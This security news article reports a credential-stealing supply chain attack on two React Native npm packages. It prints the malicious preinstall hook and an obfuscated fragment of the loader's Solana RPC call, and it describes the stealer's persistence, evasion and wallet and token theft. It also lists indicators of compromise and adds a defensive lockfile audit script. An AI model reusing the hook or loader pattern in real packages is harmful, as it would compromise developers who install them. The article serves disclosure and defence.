
Credential-Stealing npm Malware Found In Popular React Native Packages

On March 16, 2026, researchers discovered a coordinated supply chain attack targeting two popular React Native npm packages.

The compromised releases inject an install-time loader that silently downloads and executes a multi-stage Windows credential and cryptocurrency stealer. Developers trigger the infection simply by running a routine npm installation.

The Supply Chain Attack

The threat actor compromised packages published by AstrOOnauta and released malicious versions within minutes of each other.

The attack replaced clean versions with infected updates that share a byte-identical malicious payload.

| Package Name | Clean Version | Malicious Version | Monthly Downloads |
|---|---|---|---|
| react-native-international-phone-number | 0.11.7 | 0.11.8 | ~92,000 |
| react-native-country-select | 0.3.9 | 0.3.91 | ~42,000 |

According to Aikido, the malicious code relies on a new preinstall script added to the package’s configuration file. This script runs automatically before the main installation finishes.

Both malicious releases add the same package lifecycle hook:

"scripts": {
    "preinstall": "node install.js"
}

The heavily obfuscated code first contacts a Solana remote procedure call endpoint to retrieve a transaction memo containing a hidden web link for the second stage.

The original shipped installer shows the Solana RPC fetch directly:

let y = await fetch(S, {
    'method': e(0x45b, 'nSeb', 0x48f, 0x42b),
    'headers': M,
    'body': JSON[d(0x473, 'kjpv', 0x42d, 0x471)]({
        'jsonrpc': e(0x42c, ')qo^', 0x477, 0x425),
        'id': 0x1,
        'method': 'getSignatu' + e(0x441, 'PhAy', 0x42c, 0x45e) + d(0x4bb, '6bCJ', 0x4b3, 0x4d3),
        'params': [H[d(0x50d, '%Rah', 0x527, 0x4f7)](), t]
    })
});

Once downloaded, the second stage provides the necessary decryption keys to unlock the final Windows-focused stealer.

This final stage establishes persistence on the victim’s machine by modifying scheduled tasks and registry keys. To hide its tracks, the malware uses a Google Calendar URL as an extra layer of indirection to fetch its final instructions.

Impact and Evasion Tactics

The malware actively checks the victim’s system environment, including language settings and time zones, to ensure the victim does not reside in Russia.

If it detects signals like “ru_RU” or a Russian timezone, the malware silently exits. This geographic filtering is a common evasion tactic used by Russian-speaking threat actors.

If the system passes the location check, the payload searches the victim’s application data for Chromium and Firefox browser profiles.

It explicitly targets extensions for MetaMask, Phantom, Trust Wallet, and several other cryptocurrency wallets. It also executes system commands to steal authenticated npm registry tokens and GitHub credentials.

| Indicator Type | Details |
|---|---|
| Malicious Hash (SHA-256) | 59221aa9623d86c930357dba7e3f54138c7ccbd0daa9c483d766cd8ce1b6ad26 |
| Malicious IPs | 45.32.150.251, 217.69.3.152 |
| Associated Domains | socket.network, n.xyz, p.link |

Developers using these packages should audit their environments immediately.

The recommended remediation is to pin dependencies to the last known clean versions and rotate any exposed credentials.
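
One way to run that audit against a lockfile, as an added example (not code from Aikido, the article, or the package authors). It assumes an npm package-lock.json with lockfileVersion 2 or 3; the function name auditLockfile and the sample lockfile are constructed for illustration, while the package names and versions come from the table above.

```javascript
// Package names and versions are taken from the article's table.
const KNOWN_BAD = {
  'react-native-international-phone-number': { bad: '0.11.8', clean: '0.11.7' },
  'react-native-country-select': { bad: '0.3.91', clean: '0.3.9' },
};

// Returns one finding per lockfile entry that resolves to a malicious version,
// including copies nested deep in the dependency tree.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    // Keys look like "node_modules/a/node_modules/b"; the package name is the
    // part after the last "node_modules/". The root project has the key "".
    const idx = path.lastIndexOf('node_modules/');
    if (idx === -1) continue;
    // npm writes an explicit "name" when the folder is an alias.
    const name = entry.name || path.slice(idx + 'node_modules/'.length);
    const known = KNOWN_BAD[name];
    if (known && entry.version === known.bad) {
      findings.push({
        path, name, version: entry.version, pinTo: known.clean,
        // npm sets hasInstallScript when a preinstall/install/postinstall hook exists.
        hasInstallScript: entry.hasInstallScript === true,
      });
    }
  }
  return findings;
}

// Constructed sample lockfile (not taken from a real project).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/react-native-country-select': { version: '0.3.91', hasInstallScript: true },
    'node_modules/react-native-international-phone-number': { version: '0.11.7' },
    'node_modules/foo/node_modules/react-native-international-phone-number':
      { version: '0.11.8', hasInstallScript: true },
  },
};

// With a path argument, audit that lockfile; otherwise audit the sample.
const file = typeof process !== 'undefined' ? process.argv[2] : undefined;
const lock = file ? JSON.parse(require('fs').readFileSync(file, 'utf8')) : SAMPLE_LOCK;
for (const h of auditLockfile(lock)) {
  console.log(`${h.path}: ${h.name}@${h.version} (install script: ${h.hasInstallScript}) -> pin to ${h.pinTo}`);
}
```

A hit means the preinstall hook may already have run on any machine that installed from that lockfile, so pinning alone is not enough there; the credential rotation described above still applies.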


The post Credential-Stealing npm Malware Found In Popular React Native Packages appeared first on Cyber Security News.
